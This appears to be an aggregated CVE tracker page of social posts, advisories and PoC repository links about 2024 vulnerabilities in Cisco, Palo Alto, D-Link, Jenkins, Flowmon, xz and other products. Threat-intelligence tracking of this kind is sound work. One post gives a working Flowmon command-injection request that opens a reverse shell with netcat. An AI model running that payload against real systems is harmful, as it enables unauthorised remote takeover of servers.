Multiple government agencies have published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using the post-auth RCE bugs CVE-2024-20359 and CVE-2024-20358.
They don't know how the attackers initially got in.
Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":
> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
##While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:
The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.
🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability
CISA's RSS feed showed that the security alert for the KEV additions was created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.
##updated 2024-04-24T21:31:56
6 posts
1 repos
IMO this is one of the finest technical write-ups/blog posts of the year on exploiting the CVE-2024-20356 vulnerability (Cisco IMC web GUI):
✅ Complete
✅ Precise
🛠️ Toolkit available on GitHub
😄 ...and fun!
𝕮𝖆𝖓 𝖎𝖙 𝖗𝖚𝖓 𝕯𝖔𝖔𝖒?
(verdict: these "appliances" are real 🧀 )
👇
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
"Jailbreaking a Cisco appliance to run DOOM"
##Researchers at Nettitude Labs have published a write-up and PoC for CVE-2024-20356.
This is a command injection vulnerability in the web interface of the Cisco IMC servers that can be used by authenticated attackers to gain root privileges on the device.
Nettitude used the bug to install and play DOOM on the device. Cisco patched the vulnerability last week.
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
##CVE-2024-20356: Jailbreaking a #Cisco appliance to run DOOM #ciscown
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
##updated 2024-04-23T19:57:25.207000
39 posts
33 repos
Palo Alto Networks updated their security advisory for CVE-2024-3400:
We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.
This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.
Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞 cc: @todb
#CVE_2024_3400 #PaloAltoNetworks #eitw #activeexploitation #proofofconcept #poc #DFIR
##Palo Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:
It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #DFIR
##You'd expect a government advisory to contain timely and reliable information. NCSC-UK warned about CVE-2024-3400 ten days after infosec publications broke the news. This advisory was difficult to locate even on their homepage. They only mention Unit 42 and Palo Alto Networks' blogs, not Volexity's. Nothing about indicators of compromise either. Their mitigation section sounds as though all available hotfixes weren't released already (they were). The only noteworthy statement is that "Palo Alto Networks is aware of increasing exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties." 🔗 https://www.ncsc.gov.uk/news/exploitation-palo-alto-globalprotect-gateway-vulnerability
##Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/ and advisory https://cert-portal.siemens.com/productcert/html/ssa-750274.html
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #Siemens #ICS
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗 https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #PANOS #IOC
##Time to set your Palo firewalls on fire: https://security.paloaltonetworks.com/CVE-2024-3400
##Palo Alto firewalls: CVE-2024-3400 exploitation and PoCs for persistence after resets/upgrades https://www.helpnetsecurity.com/2024/04/30/palo-alto-firewalls-persistence-cve-2024-3400-exploitation/ #PaloAltoNetworks #Don'tmiss #Hotstuff #firewall #exploit #News #PoC
##Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##Another script for checking or exploiting the CVE-2024-3400 (PAN-OS) vulnerability:
https://exploitalert.com/view-details/palo-alto-pan-os-command-execution-arbitrary-file-creation
##@arstechnica >Perimeter devices ought to prevent network hacks. Why are so many devices allowing attacks?
Because of shitty engineering and nobody giving a fuck about doing things right.
It just isn't more exciting than that. Sorry.
A great recent example is the shoddy Python in Palo Alto devices (CVE-2024-3400), and of course being run as root because why not:
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
Siemens revealed that its Ruggedcom APE1808 devices configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400. https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/
##The issue, tracked as CVE-2024-3400 (CVSS score of 10/10), is described as a command injection in the GlobalProtect feature of PAN-OS, the operating system running on Palo Alto Networks’ appliances. https://www.securityweek.com/thousands-of-palo-alto-firewalls-potentially-impacted-by-exploited-vulnerability/
##updated 2024-04-23T15:30:35
1 posts
Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:
#CVE_2024_28073 #CVE_2024_29001 #CVE_2024_29003 #SolarWinds #PatchTuesday #vulnerability
##updated 2024-04-22T13:28:43.747000
4 posts
CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:
cc: @reverseics
##updated 2024-04-19T14:15:11.080000
2 posts
SolarWinds security advisory: SolarWinds Platform Arbitrary Open Redirection Vulnerability (CVE-2024-28076)
CVE-2024-28076 (7.0 high, disclosed 18 April 2024) arbitrary open redirection vulnerability. If exploited, a potential attacker can redirect to a different domain when using URL parameter with relative entry in the correct format.
Interestingly, SolarWinds wrote the vector as CVSS:7.0/AV:A/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L
I didn't know we were up to CVSSv7!!
##updated 2024-04-18T09:30:53
1 posts
Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:
#CVE_2024_28073 #CVE_2024_29001 #CVE_2024_29003 #SolarWinds #PatchTuesday #vulnerability
##updated 2024-04-17T18:31:37
1 posts
Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:
#CVE_2024_28073 #CVE_2024_29001 #CVE_2024_29003 #SolarWinds #PatchTuesday #vulnerability
##updated 2024-04-17T03:30:48
2 posts
##updated 2024-04-17T00:31:31
4 posts
1 repos
CVE-2024-21111 – Local Privilege Escalation in Oracle VirtualBox https://www.mdsec.co.uk/2024/04/cve-2024-21111-local-privilege-escalation-in-oracle-virtualbox/
##Oracle VirtualBox LPE PoC: https://github.com/mansk1es/CVE-2024-21111
##updated 2024-04-17T00:31:29
4 posts
2 repos
JVNVU#91264077: Vulnerability in ECDSA signature handling in the PuTTY SSH client https://jvn.jp/vu/JVNVU91264077/ published 2024/04/18
"When an ECDSA private key on the NIST P521 elliptic curve is used, the nonce generated when signing is biased...(CVE-2024-31497...)...the private key in use could be identified from roughly 60 signatures"
##Thanks to @gsuberland for this write up on CVE-2024-31497. Made for a fun discussion today.
##My thoughts on this are being driven by recent experiences RE CVE-2024-31497 on workstations and servers, but I want to listen to the folks who do this for a living before I start talking too much.
##updated 2024-04-16T23:24:40
2 posts
The v24.04.0 release of Malcolm contains new features, improvements, bug fixes and component version updates.
See this playlist of overview videos for an introduction to Malcolm and its main components.
Active rather than Staged, and uses tags instead to indicate that they were created through autopopulation.
zeek-live containers (#456). See this comment for more details.
docker-compose.yml files as it is now obsolete and caused a warning message that sometimes was not handled correctly.
zeekctl deploy instead of zeekctl restart.
Official ISO installer images for Malcolm and Hedgehog Linux can now be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split into 2GB chunks and can be reassembled with scripts provided for both Bash (release_cleaver.sh) and PowerShell (release_cleaver.ps1). See Downloading Malcolm - Installer ISOs for instructions.
#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #GitHub #INL #DHS #CISA #CISAgov #Kubernetes #Docker #raspberrypi
##updated 2024-04-15T20:14:55.570000
4 posts
1 repos
https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE
SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.
I have not been able to find an associated CVE number.
FYI @jullrich, the associated CVE IDs are
#CVE_2024_3272 #CVE_2024_3273 #Dlink #eitw #activeexploitation
##@cR0w @reverseics There's a timeless argument of whether or not hardcoded default credentials are a vulnerability worthy of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##updated 2024-04-12T03:30:44
2 posts
SonicWall: GitLab XSS Via Autocomplete Results
SonicWall provided vulnerability details for a cross-site scripting (XSS) vulnerability in GitLab, tracked as CVE-2024-2279 (8.7 high severity). "This vulnerability arises due to a flaw in the input validation mechanism while displaying suggestions to the user using the feature called ‘autocomplete for issues reference’ in the rich text editor."
##updated 2024-04-11T21:32:40
2 posts
The v24.04.0 release of Malcolm contains new features, improvements, bug fixes and component version updates.
See this playlist of overview videos for an introduction to Malcolm and its main components.
Active rather than Staged, and uses tags instead to indicate that they were created through autopopulation.
zeek-live containers (#456). See this comment for more details.
docker-compose.yml files as it is now obsolete and caused a warning message that sometimes was not handled correctly.
zeekctl deploy instead of zeekctl restart.
Official ISO installer images for Malcolm and Hedgehog Linux can now be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split into 2GB chunks and can be reassembled with scripts provided for both Bash (release_cleaver.sh) and PowerShell (release_cleaver.ps1). See Downloading Malcolm - Installer ISOs for instructions.
#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #GitHub #INL #DHS #CISA #CISAgov #Kubernetes #Docker #raspberrypi
##updated 2024-04-11T21:30:50
2 posts
Microsoft Security Response Center (MSRC) ominously updated CVE-2024-26198 (8.8 high, disclosed 12 March 2024) which is a Microsoft Exchange Server Remote Code Execution Vulnerability. FYI, not exploited, not publicly disclosed, exploitation is less likely. 🔗 https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-26198
Microsoft is announcing the release of a new version of the Microsoft Exchange Server updates to address all known issues that were identified in the March 2024 Security Updates. Microsoft strongly recommends installing these new updates to address the vulnerability identified by CVE-2024-26198.
I did a quick search of their 2024 March Release Notes and CVE-2024-26198 is the only Exchange vulnerability.
#CVE_2024_26198 #Microsoft #MSRC #vulnerability #PatchTuesday
##updated 2024-04-11T21:06:16
2 posts
1 repos
Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##updated 2024-04-11T01:25:29.777000
4 posts
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##updated 2024-04-10T13:24:00.070000
6 posts
1 repos
🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Windows #Infosec #CTI #CVE202426218 #Vulnerability
One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).
https://github.com/exploits-forsale/CVE-2024-26218
X Link: https://twitter.com/DarkWebInformer/status/1784930649805029824
##PoC Exploit Released For Windows Kernel EoP Vulnerability https://gbhackers.com/windows-kernel-eop-exploit-released/ #CVE/vulnerability #CyberSecurityNews #WindowsSecurity #KernelExploit #CVE202426218 #Microsoft
##updated 2024-04-09T21:32:08
2 posts
Could @cve @CVE_Program or NIST NVD consider adding rejection metadata (e.g., alternative CVEs) in the JSON structure instead of using free-text in the 'rejectedReasons' field?
This would greatly simplify parsing for https://github.com/cve-search/vulnerability-lookup and many other tools.
#cve #vulnerability #opensource #opendata
Sample one: https://vulnerability.circl.lu/vuln/cve-2024-2957
##updated 2024-04-09T18:30:28
2 posts
1 repos
CISA: CISA Adds One Known Exploited Vulnerability to Catalog
CISA adds CVE-2024-29988 (8.8 high, disclosed 09 April 2024 by Microsoft; SmartScreen Prompt Security Feature Bypass Vulnerability) to the Known Exploited Vulnerabilities (KEV) Catalog 21 days after Trend Micro and Zero Day Initiative disputed the Patch Tuesday omission of it as an exploited vulnerability.
#CVE_2024_29988 #vulnerability #knownexploitedvulnerabilitiescatalog #eitw #activeexploitation #zeroday
##updated 2024-04-08T22:47:13.533000
2 posts
1 repos
Alter Solutions: Local Privilege Escalating my way to root through Apple macOS filesystems
Yann Gascuel of Alter Solutions provides vulnerability details and Proof of Concept on CVE-2023-42931 (7.8 high) Local Privilege Escalation in macOS.
Note: This was originally patched and assigned a CVE back in December 2023, but did not get added to Apple's security advisories until 22 March 2024: About the security content of macOS Sonoma 14.2. It's a mess of a system where Apple quietly adds new CVEs to old security advisories without updating the associated RSS. Today 02 May 2024, CVE-2023-42931 is number 3 on the top 5 trending CVEs on Twitter, according to CVE Trends.
##updated 2024-04-07T15:30:32
2 posts
8 repos
https://github.com/mrrobot0o/CVE-2024-3273-
https://github.com/adhikara13/CVE-2024-3273
https://github.com/Chocapikk/CVE-2024-3273
https://github.com/ThatNotEasy/CVE-2024-3273
https://github.com/K3ysTr0K3R/CVE-2024-3273-EXPLOIT
https://github.com/yarienkiva/honeypot-dlink-CVE-2024-3273
https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE
SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.
I have not been able to find an associated CVE number.
FYI @jullrich, the associated CVE IDs are
#CVE_2024_3272 #CVE_2024_3273 #Dlink #eitw #activeexploitation
##updated 2024-04-04T07:16:03
2 posts
1 repos
Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##updated 2024-04-04T04:29:06
2 posts
9 repos
https://github.com/kenbuckler/MOVEit-CVE-2023-34362
https://github.com/Malwareman007/CVE-2023-34362
https://github.com/errorfiathck/MOVEit-Exploit
https://github.com/lithuanian-g/cve-2023-34362-iocs
https://github.com/sfewer-r7/CVE-2023-34362
https://github.com/horizon3ai/CVE-2023-34362
https://github.com/deepinstinct/MOVEit_CVE-2023-34362_IOCs
https://github.com/toorandom/moveit-payload-decrypt-CVE-2023-34362
For comparison, I think there were only about 2,500 instances of MOVEit Transfer exposed to the internet (also heavily concentrated in North America) when CVE-2023-34362 came to light.
##updated 2024-04-04T03:56:20
2 posts
1 repos
At some point recently Microsoft updated their Baton Drop guidance to indicate that instead of playing DBX bootloader whack-a-mole they are revoking the Secure Boot "Windows Production PCA 2011" (first-party) cert. This will be enforced "at least six months after the Deployment phase", which is scheduled for July 2024 "or later".
All hail "Windows UEFI CA 2023" which surely won't have any of these issues ever again.
@Rairii called it in Feb with analysis of securebootai.dll
##updated 2024-04-04T03:41:35
2 posts
Scans Probing for LB-Link and Vinga WR-AC1200 routers CVE-2023-24796 https://i5c.us/d30890
##updated 2024-04-02T15:30:43
15 posts
26 repos
https://github.com/Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability
https://github.com/wjlin0/CVE-2024-23897
https://github.com/ThatNotEasy/CVE-2024-23897
https://github.com/Athulya666/CVE-2024-23897
https://github.com/brijne/CVE-2024-23897-RCE
https://github.com/yoryio/CVE-2024-23897
https://github.com/jopraveen/CVE-2024-23897
https://github.com/xaitax/CVE-2024-23897
https://github.com/kaanatmacaa/CVE-2024-23897
https://github.com/Nebian/CVE-2024-23897
https://github.com/pulentoski/CVE-2024-23897-Arbitrary-file-read
https://github.com/10T4/PoC-Fix-jenkins-rce_CVE-2024-23897
https://github.com/B4CK4TT4CK/CVE-2024-23897
https://github.com/CKevens/CVE-2024-23897
https://github.com/Abo5/CVE-2024-23897
https://github.com/vmtyan/poc-cve-2024-23897
https://github.com/h4x0r-dz/CVE-2024-23897
https://github.com/godylockz/CVE-2024-23897
https://github.com/binganao/CVE-2024-23897
https://github.com/Vozec/CVE-2024-23897
https://github.com/WLXQqwer/Jenkins-CVE-2024-23897-
https://github.com/viszsec/CVE-2024-23897
https://github.com/ifconfig-me/CVE-2024-23897
https://github.com/adhikara13/CVE-2024-2389
🥪 & #threatintel: we published a tag for CVE-2024-2389, a command-injection vulnerability in Progress Flowmon accessible without authentication.
(fixed CVE # from a previous post)
https://viz.greynoise.io/tags/progress-flowmon-cve-2024-2389-command-injection-rce-attempt?days=10
##🚨EXPLOIT CODE🚨PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389).
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Flowmon #Infosec #CTI #CVE20242389 #Vulnerability
https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-2389
X Link: https://twitter.com/DarkWebInformer/status/1783860822386659836
##The security issue has the maximum severity score of 10/10 and was discovered by researchers at Rhino Security Labs. It is currently tracked as CVE-2024-2389. https://www.bleepingcomputer.com/news/security/maximum-severity-flowmon-bug-has-a-public-exploit-patch-now/
##PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389) https://www.helpnetsecurity.com/2024/04/24/poc-cve-2024-2389/ #networkmonitoring #RhinoSecurity #vulnerability #enterprise #Don'tmiss #Progress #News #PoC
##Rhino Security Labs publishes vulnerability details of CVE-2024-2389, which they refer to as Unauthenticated Command Injection. This includes a proof of concept. 🔗https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
Historically, Rhino has recently reported on 2 other Progress vulnerabilities scoring an 8.4 and a 10.0. Absolutely clowning this vendor. h/t @campuscodi
##@cR0w your favorite company Progress Software is at it again with another perfect score 10.0 vulnerability 🥳 h/t @campuscodi
CVE-2024-2389 (10.0 critical, disclosed 02 April 2024) Unauthenticated, remote attackers can gain access to the web interface of Flowmon to issue a carefully crafted API command that will allow arbitrary system commands to be executed without authentication. Patched and not exploited in the wild. 🔗 https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
Progress Software has released a patch to fix an unauthenticated command injection vulnerability in its Kemp Flowmon network monitoring suite: https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
Rhino Labs has published a write-up on the bug here: https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
The issue is tracked as CVE-2024-2389.
##Progress Kemp Flowmon CVE-2024-2389:
curl -kv 'https://192.168.56.12/service.pdfs/confluence?lang=en&file=`nc+-e+/bin/sh+192.168.56.1+4444`'
##updated 2024-04-01T16:13:53
2 posts
12 repos
https://github.com/TYuan0816/cve-2023-44487
https://github.com/terrorist/HTTP-2-Rapid-Reset-Client
https://github.com/sigridou/CVE-2023-44487-
https://github.com/ByteHackr/CVE-2023-44487
https://github.com/secengjeff/rapidresetclient
https://github.com/studiogangster/CVE-2023-44487
https://github.com/bcdannyboy/CVE-2023-44487
https://github.com/nxenon/cve-2023-44487
https://github.com/ReToCode/golang-CVE-2023-44487
https://github.com/pabloec20/rapidreset
Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##updated 2024-04-01T15:30:38
1 posts
Grafana allows any logged-in user, as a ""feature"", to issue arbitrary SQL queries.
CVE-2024-3128
https://fdlucifer.github.io/2024/04/22/grafana-sql-injection/
##updated 2024-03-29T18:30:50
5 posts
60 repos
https://github.com/robertdebock/ansible-playbook-cve-2024-3094
https://github.com/Mustafa1986/CVE-2024-3094
https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container
https://github.com/felipecosta09/cve-2024-3094
https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker
https://github.com/iheb2b/CVE-2024-3094-Checker
https://github.com/bioless/xz_cve-2024-3094_detection
https://github.com/k4t3pr0/Check-CVE-2024-3094
https://github.com/buluma/ansible-role-cve_2024_3094
https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker
https://github.com/0xlane/xz-cve-2024-3094
https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094
https://github.com/pentestfunctions/CVE-2024-3094
https://github.com/mesutgungor/xz-backdoor-vulnerability
https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector
https://github.com/weltregie/liblzma-scan
https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits
https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094
https://github.com/harekrishnarai/xz-utils-vuln-checker
https://github.com/robertdebock/ansible-role-cve_2024_3094
https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-
https://github.com/neuralinhibitor/xzwhy
https://github.com/Horizon-Software-Development/CVE-2024-3094
https://github.com/jfrog/cve-2024-3094-tools
https://github.com/r0binak/xzk8s
https://github.com/gustavorobertux/CVE-2024-3094
https://github.com/reuteras/CVE-2024-3094
https://github.com/ashwani95/CVE-2024-3094
https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer
https://github.com/galacticquest/cve-2024-3094-detect
https://github.com/Fractal-Tess/CVE-2024-3094
https://github.com/Juul/xz-backdoor-scan
https://github.com/badsectorlabs/ludus_xz_backdoor
https://github.com/Simplifi-ED/CVE-2024-3094-patcher
https://github.com/wgetnz/CVE-2024-3094-check
https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script
https://github.com/emirkmo/xz-backdoor-github
https://github.com/lockness-Ko/xz-vulnerable-honeypot
https://github.com/krascovict/OSINT---CVE-2024-3094-
https://github.com/mightysai1997/CVE-2024-3094-info
https://github.com/brinhosa/CVE-2024-3094-One-Liner
https://github.com/isuruwa/CVE-2024-3094
https://github.com/teyhouse/CVE-2024-3094
https://github.com/byinarie/CVE-2024-3094-info
https://github.com/amlweems/xzbot
https://github.com/bsekercioglu/cve2024-3094-Checker
https://github.com/hackingetico21/revisaxzutils
https://github.com/FabioBaroni/CVE-2024-3094-checker
https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check
https://github.com/Yuma-Tsushima07/CVE-2024-3094
https://github.com/ackemed/detectar_cve-2024-3094
https://github.com/zgimszhd61/cve-2024-3094-detect-tool
https://github.com/przemoc/xz-backdoor-links
https://github.com/ScrimForever/CVE-2024-3094
https://github.com/CyberGuard-Foundation/CVE-2024-3094
https://github.com/hazemkya/CVE-2024-3094-checker
https://github.com/dah4k/CVE-2024-3094
https://github.com/mightysai1997/CVE-2024-3094
Sysdig: Meet the Research behind our Threat Research Team – RSA 2024
I thought the title was a typo but Sysdig showcases various threats and vulnerabilities that their threat research team worked on: such as SSH-Snake, Romanian threat actor RUBYCARP, Operation SCARLETEEL, cryptojacking Operation AMBERSQUID, Meson Network, Operation LABRAT, CVE-2024-3094 (XZ Utils), and the Leaky Vessels vulnerabilities. You can meet the threat research team at booth S-742 at RSA Conference 2024, May 6 – 9 in San Francisco.
Elastic on CVE-2024-3094 🔗 https://discuss.elastic.co/t/elastic-security-statement-for-cve-2024-3094-xz-versions-5-6-0-and-5-6-1/357894
##On March 29th, 2024, Elastic became aware of the malicious code planted in the xz package. Elastic has performed an investigation to identify any Elastic Products which may be impacted by this issue and we have concluded that no Elastic products use the versions of xz affected by this vulnerability. Therefore, Elastic Products are not affected by this issue.
For those that go crying on social media about an application telling you to curl | bash
or even to curl | sudo bash
because you're running arbitrary code as root:
That is useless unless you plan to carefully review and audit every line of code that runs on your computer.
Even if you do install said app, do you actually trust its code? Do you trust its dependencies? What about its subdependencies?
There's an infinity of ways to infect an open-source repo with bad code, and some of them are actually scarily easy to perform. Do you trust that your favorite compression utility doesn't contain code that backdoors freaking ssh (https://nvd.nist.gov/vuln/detail/CVE-2024-3094) ? Do you trust that a script won't remove a critical system directory because of a misplaced space (https://github.com/MrMEEE/bumblebee-Old-and-abbandoned/issues/123) ? Or that an ubiquitous logging library can allow remote code execution because of a bad default configuration (https://en.m.wikipedia.org/wiki/Log4Shell) ?
I hope I can get this message stuck deep inside your head and let you know that unless you make your own operating system from scratch (including your free bootloader, kernel, gpu driver and the rest), you have to trust somebody. And it only takes one mistake to compromise a whole distribution, or even worse. You have to balance between having a new shiny program and having a new way to get shelled.
##updated 2024-03-29T06:30:30
4 posts
Zero Day Initiative: CVE-2024-2887: A Pwn2Own Winning Bug in Google Chrome
Manfred Paul, who demonstrated a Type Confusion exploit in Google Chrome's WebAssembly at Pwn2Own Vancouver 2024, provides root cause analysis of this vulnerability, tracked as CVE-2024-2887 (CVSS score still pending). The impact gives arbitrary reads and writes within the V8 memory sandbox. An integer underflow leading to V8 Sandbox escape allows for arbitrary code execution on a read-write-execute page.
In a new guest blog, #Pwn2Own winner @_manfp details CVE-2024-2887 - a bug he used to exploit both #Chrome and #Edge during the contest on his way to winning Master of Pwn. He breaks down the root cause and shows how he exploited it. Read the details at https://www.zerodayinitiative.com/blog/2024/5/2/cve-2024-2887-a-pwn2own-winning-bug-in-google-chrome
##updated 2024-03-26T01:00:02.003000
4 posts
1 repos
Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##CVE-2023-48788 RCE:
